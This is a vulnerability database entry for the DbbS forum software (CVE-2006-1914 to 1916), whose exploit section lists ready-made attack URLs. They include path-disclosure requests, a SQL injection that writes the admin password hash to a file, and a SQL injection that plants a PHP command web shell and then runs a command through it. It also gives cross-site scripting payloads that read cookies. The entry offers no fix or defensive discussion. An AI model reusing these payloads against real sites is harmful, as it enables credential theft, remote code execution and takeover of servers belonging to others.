DbbS<=2.0-alpha Multiple Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053270 漏洞类型
发布时间 2006-04-24 更新时间 2006-04-24
CVE编号 CVE-2006-1916
CVE-2006-1915
CVE-2006-1914
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006040093
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Special thanks to rgod for his help!!!

Full path disclosure

http://www.site.com/DbbS/topics.php?fcategoryid='
http://www.site.com/DbbS/script.php?unavariabile[]=
http://www.site.com/DbbS/script.php?GLOBALS[]=
http://www.site.com/DbbS/script.php?_SERVER[]=

MD5 Password

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%2
0null,pass%20INTO%20DUMPFILE'c:\inetpub\wwwroot\dbbs\test.txt'%20FRO
M%20forum_membres%20WHERE%20id='1'/*

Create shell

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%2
0null,'<?php%20passthru($_GET[cmd]);?>'%20INTO%20DUMPFILE'c:\inetpub\w
wwroot\dbbs\suntzu.php'%20FROM%20forum_categories/*

Launch a command

http://www.site.com/DbbS/suntzu.php?cmd=dir

XSS

http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation="><scrip
t>alert(document.cookie)</script>

http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script
>alert(document.cookie)</script>

by rgod and yamcho